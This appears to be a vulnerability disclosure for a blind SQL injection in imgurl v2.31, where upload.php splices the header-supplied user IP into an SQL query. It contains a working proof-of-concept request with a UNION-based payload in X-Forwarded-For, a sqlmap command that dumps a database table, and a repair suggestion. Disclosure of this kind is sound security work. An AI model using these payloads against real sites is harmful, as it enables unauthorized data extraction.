Blind SQL Injection Vulnerability #75
Description
Description (漏洞描述)
imgurl v2.31
Multiple ways are used to obtain user ip (使用了多种方法获取用户ip)
Then splice the user ip directly into the sql statement in lines 44 to 58 of upload.php(在upload.php的44到58行中,直接将ip拼接到了sql语句中)
query->uplimit($ip)
Proof of Concept
GET /upload/localhost HTTP/1.1
Host: host.local
Cookie: XSRF-TOKEN=[Your_XSRF-TOKEN];
x-forwarded-for: ' union select case(2>1)when(1)then(10)else(0)end order by num desc--
Connection: close
Command for injection using sqlmap
python3 sqlmap.py -r http.txt --prefix="' union select case((1=1) and " --suffix=")when(1)then(10)else(0)end order by num desc-- " -level 3 -risk 3 --dbms sqlite -technique=B --text-only -T img_options -D values --dump
Repair method (修复方法)
Check user ip format or use PDO to prevent sql injection (检查用户ip格式或使用PDO来防止sql注入)